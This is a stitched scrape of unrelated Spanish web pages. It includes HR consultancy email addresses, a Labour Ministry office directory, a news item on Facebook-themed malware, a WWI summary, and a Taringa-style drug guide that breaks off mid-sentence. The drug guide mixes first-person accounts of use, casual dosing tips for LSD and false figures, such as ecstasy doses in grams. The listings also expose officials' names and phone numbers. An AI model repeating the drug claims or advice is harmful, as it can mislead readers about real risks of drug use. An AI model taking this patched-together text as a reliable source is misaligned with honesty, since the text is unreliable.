VW CONSULTORES elsa@ssdnet.com.ar WHALECOM RECURSOS HUMANOS Y COMU info@whalecom.com.ar WIN WIN CONSULTORES curriculum@marthaalles.com.ar WORLD SOFWARE SERVICE wssbas@wssgroup.com ZIADE & ASOCIADOS info@ziade.com.ar DDL OUTSOURCING S.R.L. ddl@datamarkets.com.ar SELECCIÓN DE PERSONAL raschinder@concordia.com.ar CAMUSSI & ASOCIADOS camurrhh@arnet.com.ar PM RECURSOS HUMANOS cv@patriciamurphy.com.ar ESTUDIO LICENCIADA GRACIELA BONZINI gracielabonzini@movi.com.ar SILVIA GÉCI Y ASOCIADOS silvgeci@dynamo.com.ar INGENIERIA RITZI ritzi@houseware.com.ar PERSONET personet@fibertel.com.ar AES CONSULTORA aes@way.com.ar CREAR ORGANIZACIÓN DE RR HH crearorh@netverk.com.ar CIMTA SRL -CONSULTOR EN RR.HH busqueda@clubhp.com.ar DR. ROLAND MOESGEN & PARTNER dr_roland_moesgen@ciudad.com.ar CESAR MORCHIO & ASOCIADOS rrhh@cesarmorchio.com CONSULTORA ASTEGIANO SA ingreso@consulas.com.ar INTER CONSULTORA ORGANIZACIONAL olivari@net12.com.ar NORA FERRER Y ASOCIADOS curriculumvitae@noraferreryasoc.com CLAVES CONSULTORA claves@smandes.com.ar DEVSA CONSULTORES devsa@overnet.com.ar RODOLFO ECKE & ASOCIADOS rodolfoecke_asoc@cpsarg.com CONSULTING GROUP consultinggroup@hotmail.com DUBOIS, GONZALEZ & ASOCIADOS CONSUL rdubois@fcecon.unr.edu.ar CSC CONSULTORÍA ESPECIALIZADA EN HOT csc@arnet.com.ar CHOICE HUMAN RESOURCES SRL choice@icatel.net MANPOWER PROFESSIONAL professional@manpower.com.ar _______________________________________________________________________________________________ DELEGACIONES DE MINISTERIO DE TRABAJO EN BUENOS AIRES Y LAS PROVINCIAS Cita : SAN NICOLÁS: Jefe de Agencia: Lic. Oscar Néstor Ugarte- Italia 144 - CP 2900 San Nicolás - Bs. As. – Tel: (03461) 423171/ 423161 at_sannicolas@trabajo.gov.ar MAR DEL PLATA: Jefe de Agencia: CPN Ángel Ratto – Sgo. Del Estero 1656 CP 7600 - Mar del Plata - BA.- Tel: (02... at_mardel@trabajo.gov.ar BAHÍA BLANCA: Jefe de Agencia: CPN Gerardo Benjamín Rotstein- Alsina 19 3° CP 8000 - Bahia Blanca - Bs. As. - Tel: (0291) 452-1219/ 455-0350 at_bahia@trabajo.gov.ar JUNÍN: A/c de Ex Delegación: Sr. Ricardo N. Carballo - Bartolomé Mitre 225- - CP 6000 - Junín - Bs. As. Tel/Fax: (02... at_junin@trabajo.gov.ar TANDIL: A/c de Ex Delegación: Dr. Juan Carlos Berrios – Gral Rodriguez 780 - CP 7000 Tandil - Bs. As. (Tel 02293) 423329- Fax: 423955 atandil@trabajo.gov.ar LA PAMPA: Jefe de Agencia: Sr. Senen Gonzalez Edgardo – Roca 602 – CP 6300 Sta. Rosa La Pampa Tel.: (02954) 433048/434519 alapampa@trabajo.gov.ar CONURBANO Lic. Juan Iacona LA MATANZA: Jefe de Agencia: Lic. Carlos Barbalarga a/cLic.Diego Pazos – Comisionado Indart 2676– San Justo - Bs. As – Tel/Fax: 4484-0661/1166/1311 at_moron@trabajo.gov.ar SAN MARTÍN: a/c Lic Florencia Antoniou– Ramón Carrillo 2206 P°1 CP 1650 - San Martín B A - Tel:4755 - 1621 – Fax. 4755 - 6636 at_sanmartin@trabajo.gov.ar LOMAS DE ZAMORA: Jefe de Agencia: Sr. Gustavo Pedernera - Av. Meeks 1393 CP 1834- Temperley- Bs. As. Tel: 4244-2461 Fax 4244-9214/0640 at_lomas@trabajo.gov.ar LA PLATA: Jefe de Depto Operativo: Dra Martha Duran de Savarino Calle 51 N° 476 y 1/2 (ex 484) Pta. Baja, Of. 2 Entre calles 4 y 5 - CP 1900 - La Plata - Bs. As. Tel: (0221) 4821861/ 4830519 Cel: 15.53151634 at_laplata@trabajo.gov.ar AUSTRAL Lic. Jorge Stopiello RÍO NEGRO (Gral. Roca): Jefe de Agencia: Sr. Oscar Gonzalez ( a cargo) Av. Roca y Tucumán Gral. Roca Río Negro CP 8332 Tel02941)423105/423511 at_rionegro@trabajo.gov.ar RÍO GALLEGOS: Jefe de Agencia: Dr. Jorge Martinez – Fagnano 307 – CP 9400 - Río Gallegos – Sta. Cruz Tel.: (02966) 422210/420082 ARIOGALLEGOS@trabajo.gov.ar CALETA OLIVIA: A/C Ex Delegación: Sr. Roque Vitale Eva Perón 400 – C. Olivia Sta. Cruz – CP 9011 Tel.: (02... – Acaletao@trabajo.gov.ar TRELEW: Jefe de Agencia: CPN. Alejandro Torres Fontana 424 P° 1 – Trelew Chubut – CP 9100 – Tel.(02965) 426425 fax 25762 ATRELEW@trabajo.gov.ar CDORO. RIVADAVIA: Jefe de Agencia: Dr. Ricardo Cerezo Ameghino 925 – Comodoro Riv. Chubut – CP 9000 Tel.: (0297) 4472338 Fax 4471198 at_comodoro@trabajo.gov.ar RÍO GRANDE: Jefe de Agencia: CPN. Luís Gómez 9 de julio 766 –CP 9420. Río Grande – T. Del Fuego Tel.: (0296) 4430044 /4422079 ATIERRADELFUEGO@trabajo.gov.ar NEUQUÉN: Jefe de Agencia:a/c Sra. María M. Maldonado Córdoba 67 – 1° Piso - CP 8300 Neuquén Tel: (0299) 443-5985 Fax: 443-6494 ANEUQUEN@trabajo.gov.ar CUYO Dr. Miguel Cerutti MENDOZA: Lic.Gerardo Garrote- a/c Despacho Eusebio Blanco 450 P° 2 - CP 5500 – Mendoza – Tel: (0261) 4205043/4258249 Fax 420-3420 AMENDOZA@trabajo.gov.ar SAN LUIS: Jefe de Agencia: Lic. Patricia B. Picca Colón 580 - CP 5700 San Luis Tel: (02652) 421236/437636/453822 ASANLUIS@trabajo.gov.ar SAN JUAN: Jefe de Agencia: Dr. Hugo Ariel Trigo Catamarca 480 – Sur - San Juan – CP 4500 Tel: (0264) 4223853/222189/42219 at_sanjuan@trabajo.gov.ar LA RIOJA: Jefe de Agencia: Ing. Edgardo Céliz Mercado 25 de Mayo 74 – 1° Piso - CP 5300 - La Rioja – Tel: (03822) 460321/2/423214 Fax 460323 at_larioja@trabajo.gov.ar CENTRO Prof. Roberto Deb SANTA FE: Jefe de Agencia: Ing. Oscar A. Bianchini San Martín 2533 P° 1 – Sta Fe CP 3300 Tel.: (0342) 452-28046 Fax 453-7929 at_santafe@trabajo.gov.ar ROSARIO: Jefe de Agencia: Dr. Rubén Ferreyra Rioja 1120 P°4 – Rosario CP 2000 - Tel: (0341) 440-2172 Fax: 440-2176/49 Arosario@trabajo.gov.ar CÓRDOBA: Jefe de Agencia: a/c Lic. Agustín Heredia 27 de Abril 359 – Córdoba CP. 5000 – Tel.: (0351) 4237566 Fax. 4220049 at_cordoba@trabajo.gov.ar PARANÁ: Jefe de Agencia: Dr. Lopez Domiguez Carlos España 321 P° 1 - CP. 3100 - Paraná – Entre Ríos – Tel: (0343) 442-2704 Fax: 421-8794 APARANA@trabajo.gov.ar CONCORDIA: A/c de Ex Delegación: Sr. Juan C. Boladeres Hipolito Yrigoyen 487 P° 2 - CP. 3200 – Entre Ríos - Tel.: (0345)421-7047/421-3071 ACONCORDIA@trabajo.gov.ar NEA Lic. Marcelo Servelló RESISTENCIA: Jefe de Agencia: a/c Lic. Alcídes Godano Arturo Illia 560 Pta Alta CP 3500 Resistencia Chaco Tel.: (03722) 425160 - Fax. 426499– ACHACO@trabajo.gov.ar CORRIENTES: Dr. Justo José Zapponi Santa Fe 867 CP 3400 – Corrientes - Tel: (03783) 422032 Fax: 422009 ACORRIENTES@trabajo.gov.ar MISIONES: Jefe de Agencia: Dra. Alicia Cabral 3 de febrero 1940 P° 1 CP. 3300 Posadas Misiones Tel.: (03752) 437675 – fax. 425093 AMISIONES@trabajo.gov.ar FORMOSA: Jefe de Agencia: CPN. Ursula Graciela O. De Dobler Fontana 626 – P.B. Formosa – CP 3600 Tel.: (03717) 424585/430359– Aformosa@trabajo.gov.ar NOA Ing. José Hugo Ceriani JUJUY: Jefe de Agencia: Ing. Juan Carlos Murga Av. Senador Pérez 125/127 Jujuy – CP 4600 – Tel.0388) 4237808 – Fax. 4237903 at_jujuy@trabajo.gov.ar SALTA: Jefe de Agencia: Lic. Oscar E. Burgos Gral. Guemes 431/5 - Salta CP 4400 – Tel: (0387) 4313-428/771/ 4314-327 ASALTA@trabajo.gov.ar TUCUMÁN: Jefe de Agencia: Lic. Eduardo Más Merino 24 de Septiembre 675 - Entrepiso Tucumán CP 4000 Tel.: (0381) 422-9603 – Fax. 430-0829 ATUCUMAN@trabajo.gov.ar SGO DEL ESTERO: Jefe de Agencia: Sr. José Gómez – Av. Roca 535 P° 1 - Sgo. del Estero – CP 4200 Tel. (0385) 421-1252/422-2736 at_santiago@trabajo.gov.ar CATAMARCA: Jefe de Agencia: Lic. Inés Blas de Zamora Calle SALTA 499 - San Fernando del Valle de Catamarca. Tel. (03833) 458946 / 458952 at_catamarca@trabajo.gov.ar

Hola Taringa. Hoy les traigo "Los Simpsons inedito"Espero Que Lo Disfruten Primero Imagenes

Estos virus informáticos piden a los usuarios por e-mail o por mensajería instantánea que bajen archivos contaminados, según informó hoy la compañía de antivirus Panda Security. El primero de ellos, un programa de tipo "troyano" es capaz de operar en la computadora de un usuario sin su permiso para enviar spam o correo basura. Se llama "Asprox.N" y se propaga desde un correo electrónico con un documento adjunto en el que dice hablar en nombre de Facebook. Le notifica al usuario que su cuenta genera spam y que su contraseña ha sido cambiada. Dentro del mensaje hay un archivo de Word donde aparentemente estaría la clave. Pero, al descargar el adjunto, el usuario habilita todos los puertos y envía este spam a sus contactos, sin que este ni siquiera lo note. El segundo, "Lolbot.Q", se difunde a través de enlaces en servicios de mensajería instantánea e "inmoviliza" la cuenta del usuario en el Facebook. Después, el virus le pide al navegante su número de teléfono para que la empresa le envíe una contraseña nueva para que pueda ingresar a la red social, cuando en realidad lo que hace es suscribir al usuario a un servicio de mensajería por el que puede llegar a pagar cerca de 45 pesos a la semana. Panda Security, recomienda desconfiar de cualquier mensaje con un asunto "excesivamente llamativo", además de ser cuidadosos al momento de facilitar datos personales en Internet. Cada vez más los hackers aprovechan la masiva popularidad de Facebook, con más de 500 millones de usuarios en todo el mundo, y lo convierten en el blanco perfecto para promover sus actividades piratas. Fuente:Clarin

La Primera Guerra Mundial o Gran Guerra fue un conflicto armado que tuvo lugar entre 1914 y 1918, y que produjo más de 10 millones de bajas. Más de 60 millones de soldados europeos fueron movilizados desde 1914 hasta 1918.Originado en Europa por la rivalidad entre las potencias imperialistas, se transformó en el primer conflicto bélico en cubrir más de la mitad del planeta. Fue en su momento el más sangriento de la historia. Antes de la Segunda Guerra Mundial, esta guerra solía llamarse la Gran Guerra o la Guerra de Guerras. Fue la segunda guerra más dañina de la historia tras la Segunda Guerra Mundial La guerra comenzó como un enfrentamiento entre el Imperio austrohúngaro y Serbia. Rusia se unió al conflicto, pues se consideraba protectora de los países eslavos y deseaba socavar la posición de Austria-Hungría en los Balcanes. Tras la declaración de guerra austrohúngara a Rusia el 1 de agosto de 1914, el conflicto se transformó en un enfrentamiento militar a escala europea. Alemania respondió a Rusia con la guerra, obligada por un pacto secreto contraído con la monarquía de los Habsburgo, y Francia se movilizó para apoyar a su aliada. Las hostilidades involucraron a 32 países, 28 de ellos denominados «Aliados»: Francia, el Reino Unido, Imperio Ruso, Serbia, Bélgica, Canadá, Portugal, Japón, Estados Unidos (desde 1917), así como el Reino de Italia, que había abandonado la Triple Alianza. Este grupo se enfrentó a la coalición de las «Potencias Centrales», integrada por los imperios Austrohúngaro, Alemán y Otomano, acompañados por Bulgaria Aqui Un Mapa Para que sepan donde fue la guerra Miren Como Quedo Un Pueblo en las afueras de roma Causas y consecuencias La Paz Armada A finales del siglo XIX, el Reino Unido dominaba el mundo tecnológico, financiero, económico y sobre todo político. Alemania y Estados Unidos le disputaban el predominio industrial y comercial. Durante la segunda mitad del siglo XIX y los inicios del siglo XX se produjo el reparto de África (a excepción de Liberia y Etiopía) y Asia Meridional, así como el gradual aumento de la presencia europea en China, estado en franca decadencia. Reino Unido y Francia, las dos principales potencias coloniales, se enfrentaron en 1898 y 1899 en el denominado incidente de Faschoda, en Sudán, pero el rápido ascenso del Imperio alemán hizo que los dos países se unieran a través de la Entente cordiale. Alemania, que solamente poseía colonias en Camerún, Namibia, África Oriental, algunas islas del Pacífico (Islas Salomón) y enclaves comerciales en China, empezó a pretender más a medida que aumentaba su poderío militar y económico posterior a su unificación en 1871. Una desacertada diplomacia fue aislando al Reich, que sólo podía contar con la alianza incondicional del Imperio austrohúngaro. Por su parte, Estados Unidos y, en menor medida, el Imperio ruso controlaban vastos territorios, unidos por largas líneas férreas (ferrocarril Atlántico-Pacífico y Transiberiano, respectivamente). Francia deseaba la revancha de la derrota sufrida frente a Prusia en la Guerra Franco-prusiana de 1870-1871. Mientras París estaba asediada, los príncipes alemanes habían proclamado el Imperio (el llamado Segundo Reich) en el Palacio de Versalles, lo que significó una ofensa para los franceses. La III República perdió Alsacia y Lorena, que pasaron a ser parte del nuevo Reich germánico. Las generaciones francesas de finales del siglo XIX, sobre todo el Ejército, crecieron con la idea de vengar la afrenta recuperando esos territorios. En 1914 sólo hubo un 1% de desertores en el ejército francés, en comparación con el 30% de 1870. Mientras tanto, los países de los Balcanes liberados del Imperio otomano (el «enfermo de Europa») fueron objeto de rivalidad entre las grandes potencias. Turquía, que se hundía lentamente, no poseía en Europa —hacia 1914— más que Estambul, la antigua Constantinopla. Todos los jóvenes países nacidos de su descomposición (Grecia, Bulgaria, Rumanía, Serbia, Montenegro y Albania) buscaron expandirse a costa de sus vecinos, lo que llevó a dos conflictos entre 1910 y 1913, conocidos como Guerras Balcánicas. Impulsados por esta situación, los dos enemigos seculares del Imperio Otomano continuaron su política tradicional de avanzar hacia Estambul y los Estrechos. El Imperio Austrohúngaro deseaba proseguir su expansión en el valle del Danubio hasta el mar Negro, sometiendo a los pueblos eslavos. El Imperio Ruso, que estaba ligado histórica y culturalmente a los eslavos de los Balcanes, de confesión ortodoxa —ya les había brindado su apoyo en el pasado— contaba con ellos como aliados naturales en su política de acceder a «puertos de aguas calientes». Paises Que Participaron Bélgica Francia Estados Unidos Reino Unido Australia Canadá India Británica Nueva Zelanda Sudáfrica Terranova Imperio del Japón Imperio ruso Reino de Italia Reino de Grecia Reino de Montenegro Reino de Rumania Reino de Serbia República portugesa Imperio austrohúngaro, Imperio alemán, Imperio otomano, Reino de Bulgaria Unas Armas Viejas No?

¿Qué son las drogas? - ¿QUÉ ES UNA DROGA? Definición: "Droga" es toda sustancia que, introducida en el organismo por cualquier vía de administración produce una alteración del natural funcionamiento del sistema nervioso central del individuo y es, además susceptible de crear dependencia, ya sea psicológica, física o ambas. Clasificación de las drogas -Drogas duras y blandas La diferencia entre una droga dura y una droga blanda es que aquella causa una adicción y/o una dependencia física y psíquica, mientras que una droga blanda solamente causa una sola adicción y/o dependencia, la cual puede ser a nivel psíquico solo o físico solo. Drogas duras: la cocaína, los opioides (morfina, heroína, etc.), el alcohol, o las anfetaminas son comúnmente descritas como drogas duras. Drogas blandas: el término es aplicado generalmente a los derivados del cannabis (marihuana, hachís, etc.), a la cafeína, etc. Por lo general el término se aplica a sustancias cuyo consumo no conlleva patrones de comportamiento social desadaptativos. - No pretendo hacer apología ni incitar al consumo de drogas, solo informo de lo que son, como son, etc.. Cada uno es dueño de sus acciones. La más famosa: La marihuana - Cannabis sativa es conocida en castellano como «cáñamo», «macoña», «marihuana» o «mota». 1. ¿Qué es la marihuana? Es una planta (cannabis sativa) con los efectos psicoactivos debido a que contiene una sustancia química llamada delta-9 tetrahidrocannabinol (THC (la sustancia que "pega"). Al contrario de como se cree comunmente las hojas de la planta no son las que hacen el efecto, sino las flores de la planta (cogoyos). 2. Efectos inmediatos de la marihuana (varían): Unas veces hay euforia e irrealidad; otras veces dificultades de atención y temores. Luego se altera la percepción sensorial; aparece un exceso de sensibilidad y sugestionabilidad que produce altibajos y cambios de humor. La marihuana disminuye el control afectivo con pérdida de dominio propio. Perturba el cerebro originando una situación de risa tonta con la mirada perdida, fantasías, desorientación, incluso alucinaciones (no está comprovado que produzca esto, eso dice internet). Opinión personal mejor dicho 'en cristiano' : Los efectos que te suelen dar es relajación, no te podés concentrar, dejás de prestar tanta atención al alrededor y te centrás más en tus pensamientos, te "colgás" pensando cosas, aumenta mucho la imaginación, la música y sonidos se "ollen mejor", muuchas risas, después no te acordás de mucho (esto es debido a que no prestás tanta atención al entorno como dije antes entonces el cerebro no retiene esas 'imágenes'), el tiempo pasa leeenstísimo (capaz pensás que paso 1hr y apenás transcurrieron 20 minutos..),vista de las cosas en otro modo.. Después del efecto viene el denominado "bajón", esto genera muchísima hambre y cansancio (recomendable para dormir mejor). La marihuana no produce alucinaciones como suelen mostrar en la TV o en dibujos, etc... 3. Primera vez: Por razones que aún se desconocen, la primera vez que se consume marihuana, la persona no siente los efectos, es así, que esta recién comenzará a sentir los efectos en su 2da o 3era vez. 4. Muertes causadas por la marihuana: Las muertes causadas por la marihuana se elevan al número de 0, en toda la historia de la humanidad. No existe ningún caso de sobredosis de marihuana. 5. Usos medicinales: Se sabe que la marihuana tiene usos medicinales en: Cancer, Depresión, Artritis, migraña, asma, dolores, epilepsia, y más. (se las hago corta porque se que es al pedo poner 'copiar-pegar' y se van las ganas de leer). Para más info: http://www.marihuana-medicinal.com/ 6. ¿ Causa adicción la marihuana?: La marihuana no causa adicción fisiológica (como la del cigarrillo), sino que causa una adicción psicológica (hábitos, uno toma la costumbre o 'hecha de menos' la sensación). 7. Legalidad: El uso medicinal del cannabis es legal en un número limitado de territorios en todo el mundo, entre ellos: Canadá, Alemania, Austria, Holanda, España, Israel, Finlandia y Portugal. En Estados Unidos, quince estados han reconocido la marihuana medicinal: Alaska, Arizona, California, Colorado, Hawái, Illinois, Maine, Míchigan, Montana, Nevada, Nuevo México, Oregón, Rhode Island, Vermont y Washington. No es ilegal su consumo en Argentina, pero si su venta y cultivo. ¿Contradictorio no? 8. Modo de consumo de la marihuana: Via pulmonar o también puede ser via oral, Opinión personal: se dice que la marihuana te lleva a otras drogas como la cocaína, etc.. Considero que esto es mentira, lo que genera esto es el ambito ilegal en el que está embuelta la marihuana... El 'transa' (vendedor) tiene en una mano marihuana y en la otra cocaína y otras, ¿esto que genera? que vos estés en un entorno de fácil acceso a ellas ... ¿Solución? La legalización evitaría que uno tubiera que ir a comprar al mercado negro, y podría disponer de su propia marihuana natural en su casa... Uno no puede cultivar cocaína, LSD, extásis, etc.. En su casa.. ¿Me entienden?, por lo tanto se perdería ese fácil acceso a estas drogas turbias. La que se ve en todos lados: La cocaína 1.¿Qué es la cocaína?: La cocaína (También llamada 'merca', 'polvo de ángel', etc..), es un alcaloide que se obtiene de la planta de coca (se le hacen varios tratamientos químicos para conseguir la sustancia en sí). Es un estimulador del sistema nervioso y supresor del hambre, era usado en medicina como anestésico, incluso en niños, específicamente en cirugías de ojos y nariz pero actualmente está prohibido. 2. Efectos de la cocaína: Sensación de euforia, autoconfianza, energía, pues suprime la sensación de cansancio para luego derrumbarse al pasar los efectos. Locuacidad, hablar sin ton ni son. Nervios en tensión, ganas de moverse. Pérdida de dominio propio. Se salta a discutir y pelearse al menor motivo. Ansiedad. Opinión personal mejor dicho 'en cristiano': Te sentís 'dios',también sentís dormida la nariz y parte del rostro. Apenas la consumís en unos pocos segundos, se siente una fuerza increíble, como una especia de hiperactividad, como 'las re pilas'. Pero no se las recomiendo chicos, enserio. Tengan muchísimo cuidado porque muy peligrosa y adictiva. 3. Primera vez: Si produce los efectos la primera vez que se consume. 4. Muertes causadas por la cocaína: No hay datos con exactitud Encontré esto investigando: Varios países han facilitado información sobre muertes por cocaína en 2003 (informes nacionales de la red Reitox): Alemania (25 casos por cocaína sola y 93 por cocaína combinada con otras drogas; en 2002, las cifras fueron 47 y 84, respectivamente), Francia (10 muertes por cocaína sola y una por cocaína asociada a un medicamento), Grecia (dos casos por cocaína), Hungría (cuatro muertes por sobredosis de cocaína), los Países Bajos (17 muertes por cocaína en 2003, con una tendencia al alza entre 1994 —dos casos— y 2002 —37 casos—), Austria (se halló cocaína en el 30 % de las muertes relacionadas con el consumo de drogas, aunque solamente en tres casos se halló cocaína sola y en un caso asociada a un gas), Portugal (se halló cocaína en el 37 % de las muertes relacionadas con el consumo de drogas) y el Reino Unido (la «mención» de la cocaína en los certificados de defunción pasó de 85 casos en 2000 a 115 en 2001 y 171 en 2002, multiplicándose por ocho entre 1993 y 2001). En su informe nacional Reitox, España ha declarado que, en 2001, la cocaína estuvo presente en el 54 % de las muertes relacionadas con el consumo de drogas; en 39 casos (el 8 % de todas las muertes relacionadas con drogas) la muerte se produjo en ausencia de opiáceos, y 21 de estos casos se debieron a cocaína únicamente y cinco a la mezcla de cocaína y alcohol. ( ) 5. Adicción a la cocaína: Es muy fuerte la adicción a la cocaína. La cocaína disminuye la voluntad y crea fuerte adicción psíquica que hace costoso dejarla. Para conseguirlo se recomienda: tener el tiempo ocupado, cortar con los ambientes de droga y buscar el apoyo de alguien. Opinión personal: La mejor forma de dejarlo, es no probarla nunca. La primera vez que se consume ya se siente importantes ganas de volver a probarla. Es el día de hoy que siento ganas de volver a provarla 6. Situación legal: Ilegal. 7. Modo de consumo de cocaína: Las principales formas de usar la cocaína son por vía oral, nasal, intravenosa o pulmonar. La droga más 'flashera': El LSD .jpg] 1. ¿Qué es el LSD?: La dietilamida de ácido lisérgico, LSD-25 o simplemente LSD (también llamada 'Pepa', 'ácido', 'cartón', etc..), es una droga semisintética de efectos psicodélicos que se obtiene de la ergolina y de la familia de las triptaminas. 2. Efectos del LSD: El potencial alucinógeno de esta sustancia provoca distorsiones perceptivas , entre ellas una mayor sensibilidad y apreciación a través de los sentidos: tacto, vista, oído , olfato y gusto. También genera cambios en la percepción del tiempo, cambios en el estado de ánimo, desbloqueo de recuerdos reprimidos y una expansión de conciencia que generalmente es vivida como una pérdida de las fronteras del yo. Opinión personal mejor dicho 'en cristiano' : Alucinaciones (los objetos se deforman, capaz alucinas un duende te habla y cosas así), te conocés a vos mismo, pensamientos muy profundos, percepción de la naturaleza y entorno de otra forma, personalmente una cosa que obeservé, esque uno observa a las personas/seres vivos, y pude distinguir con su expresión su estado de ánimo, tal vez problemas.. Etc! realmente muy flashero! , recuerdo el viaje muy bien, y la verdad me gustó (no quiero hacer apología ni nada, solo cuento mi experiencia). El efecto puede durar de 5 a 10 hrs aprox. (depende la cantidad consumida). 3. Primera vez: Si se sienten los efectos la primera vez, es recomendable comenzar con 1/4 o media 'pepa', para tener un buen viaje y no asustarse de sus poderosos efectos. 4. Muertes causados por el LSD: No existe un riesgo de sobredosis física, si bien podrías llegar a tener problemas por consumir una dosis mayor de la que psicológicamente podés manejar. La dosis letal de LSD en humanos es decenas de miles de veces una dósis normal. Osea 0. 5.Adicción al LSD: El LSD NO tiene potencial de adicción física. Tampoco tiene adicción psicológica. 6. Situación legal: Actualmente, la situación legal de la LSD viene determinada por el Convenio de Viena de 1971, donde se la clasifica dentro de los psicotrópicos, junto con la fenciclidina, el XTC, la anfetamina y la metanfetamina. Por lo tanto es ilegal. No es ilegal su consumo. 7. Modo de consumo del LSD: Tableta (cartón) (puesto en el ojo u oralmente), también viene en cápsulas y a veces en líquido. La más berreta: El paco 1. ¿Qué es el paco?: (llamada también pasta básica de cocaína, pasta base o PBC) es una droga de bajo costo elaborada a partir de bicarbonato de sodio, cafeína, alcaloide de cocaína y anfetaminas. 2. Efectos del paco: La euforia que siente el usuario al ingerir una dosis dura de 1 a 5 minutos, dependiendo de la cantidad y la calidad de la droga. 3. Muerte por paco: No cifras exactas, pero el consumo intenso de paco puede producir muerte cerebral en al menos 6 meses (Según el gobierno de la Provincia de Buenos Aires). 4. Adicción al paco: Altamente adictiva y como resultado, la droga y no quien la usa, es quien manda. Incluso después de consumirla, puede crear ansias físicas y psicológicas que hacen muy difícil que se puedan dejar de consumir. 5. Situación legal: Ilegal, al igual que todos los derivados de la cocaína. 6. Modo de consumo del paco: Se suele consumir por vía respiratoria en pipas (generalmente caseras) o sobre la marihuana en forma de cigarrillo (marciano, maduro, bazoco, Free o ensacado). La droga de los boliches y fiestas electrónicas: El éxtasis 1. Que es el éxtasis: Esta es una de las más recientes drogas de moda creadas ilegalmente por químicos clandestinos. Tiene el aspecto de polvo blanco, pastillas o cápsulas. El éxtasis es una droga popular entre adolescentes en las discotecas porque es fácil de obtener en fiestas "rave", discotecas y conciertos. 2. Efectos del éxtasis: Esta droga combina un alucinógeno con un efecto estimulante, haciendo que todas las emociones, tanto negativas como positivas, sean mucho más intensas (mucha 'pila'). Los que lo consumen notan una especie de hormigueo en la piel y una mayor frecuencia cardiaca. También puede causar sequedad en la boca, calambres, visión borrosa, escalofríos, sudoración y náuseas. Muchos consumidores dicen también que sufren depresión, paranoia, ansiedad y confusión. 3.Muertes causadas por el éxtasis: Las muertes causadas por sobredosis de cocaína, anfetaminas o éxtasis, sin intervención de opiáceos, son poco frecuentes en Europa. No obstante, varios países (España, Francia, Italia, Países Bajos y Reino Unido) indican que se ha producido un aumento a escala nacional o local del número de víctimas en que se encontró cocaína, generalmente junto con otras sustancias, si bien esta información se publica de manera heterogénea. La dosis peligrosas comienzan a partir de los 6 g y una dosis letal sobrepasa los 12 g. 4. Adicción al éxtasis: Aunque se desconoce la adicción física del éxtasis, los jóvenes que la consumen se pueden volver psicológicamente dependientes de esta droga para sentirse bien, enfrentarse a la vida o al estrés. 5. Situación legal: Es ilegal, dado que esta en la “lista 1″ de la Ley de Sustancias Controladas (El CSA es la base legal por la cual la manufactura, importación, posesión y distribución de ciertas drogas están reguladas por el gobierno federal de los Estados Unidos). 6. Modo de consumo del extasis: El éxtasis se ingiere y a veces se inhala. La más adictiva: La heroína 1. ¿Qué es la heroína?: La heroína se produce a partir de la leche seca de la adormidera, que también se usa para crear la clase de medicamentos contra el dolor llamados narcóticos - como la codeína y la morfina. La heroína puede variar desde polvo blanco o marrón oscuro hasta una sustancia pegajosa y parecida al alquitrán. 2. Efectos de la heroína: La heroína te da una sensación inmediata de euforia, especialmente si se inyecta. Este viaje a veces va seguido de somnolencia, náuseas, calambres estomacales y vómitos. 3. Muertes por heroína: Al comenzar la década, unas 2.000 personas morían al año por sobredosis de heroína en Estados Unidos, según el Centro de Control de Enfermedades. Hacia el 2008, hubo unas 3.000 muertes atribuidas a la heroína en 36 estados. No hay datos sobre las víctimas del 2009. 4. Adicción a la heroína: La heroína es MUY extremadamente adictiva y es fácil sufrir una sobredosis (que puede provocar la muerte). La abstinencia es intensa y los síntomas incluyen insomnio, vómitos y dolor muscular. Se considera una de las drogas más adictivas o la más adictiva. 5. Situación legal: Es ilegal en la mayoría de los países del mundo. 6. Modo de consumo de la heroína: La heroína se inyecta, se fuma o se inhala (si es pura). Las drogas legales Existen varios tipos de drogas , sustancias que provocan adicción. Hoy hablaremos del alcohol y el tabaco que son los que provocan cambios directos en el organismo. Hoy son sustancias legales, lo son desde hace mucho tiempo, pero quizás algun dia las cosas cambien. El tabaco, empujado por la potente industria tabaquera que con su marketing y la potente adicción de la nicotina han provocado millones de adictos en todo el mundo en las últimas décadas. Es una droga cuyo único efecto no existiria si no existiese la adicción, es decir que provoca bienestar simplemente porque los adictos están nerviosos cuando no fuman, en su ausencia se encuentran mal y les es muy compliado dejarlo. Hoy en dia se esta endureciendo la ley en muchos aspectos en contra del tabaco, quizás dentro de unas décadas se haya erradicado su consumo, pero será dificil. El alcohol es otra droga legal muy consumida en todo el mundo, aquí en España además es el protagonista común en un montón de fiestas regionales, así como tradición en muchos sitios, en muchos grupos de gente… El alcohol es peligroso por ser causante de muchos accidentes de tráfico y de salud, además de provocar adicción y daños en el hígado y el cerebro. Aunque hay gente que no sufre perjuicios por beber alcohol de manera moderada, otros empiezan así y acaban acudiendo a centros de desintoxicación o a alcohólicos anónimos porque la adicción al alcohol destruye sus vidas, cuerpos y familias. Las drogas 'folklóricas' (legales) Son aquellas que provienen de la naturaleza y su uso es ancestral, se podría decir que son las primeras que utilizó el hombre; principalmente en curaciones o rituales religiosos por determinados grupos étnicas. Entre estos tenemos variedad de vegetales con propiedades medicinales y otras con efectos alucinógenos. Ejemplo : El eucalipto, la manzanilla, etc.; otros son Ayahuasca, Chamico, San Pedrito, Floripondio, etc. El floripondio Son campanitas de colores que crecen como una enredadera silvestre en cualquier lugar y también en la costanera viedmense. Pero esta pequeña y hasta insignificante flor tiene un alto poder estimulante. Un té de una de estas campanitas produce en pocos minutos un estado de gran excitación que deviene luego en depresión, efecto que se prolonga durante 72 horas, al margen de que produce daños en la salud. Posee poderosas cualidades alucinógenas, y hasta mortales en exceso. Aun así esta planta no esta prohibida como otras más conocidas. Efectos: Sobre la escopolamina se sabe que no es un alucinógeno en el mismo sentido que puede serlo el LSD o la mezcalina, pues las alucinaciones no son sólo visuales, sino también auditivas e incluso táctiles. A menudo se pierde el contacto con la realidad por completo y un observador externo puede ver al sujeto intoxicado sosteniendo conversaciones incoherentes con personas inexistentes o realizando acciones totalmente fuera de contexto. El san pedro El San Pedro es un cactus columnar, largo y de crecimiento rápido. Cada año se eleva aproximádamente un metro y su diámetro aumenta alrededor de 12 centímetros. El San Pedro es la tercera cactácea con mayor concentración de mezcalina después del peyote y la variedad Trichocereus peruvianus que es más difícil de encontrar. La mezcalina es un alcaloide sumamente estable. Se ha detectado en antiguas muestras de un entierro mexicano que data de hace 1000 años. Efectos: Para Schultes y Hoffman, según establecen en Plantas de los Dioses, el más espectacular de los múltiples efectos del peyote es "El juego caleidoscópico de visiones coloridas de indescriptible belleza […] se perciben destellos y centelleos de colores, cuya intensidad 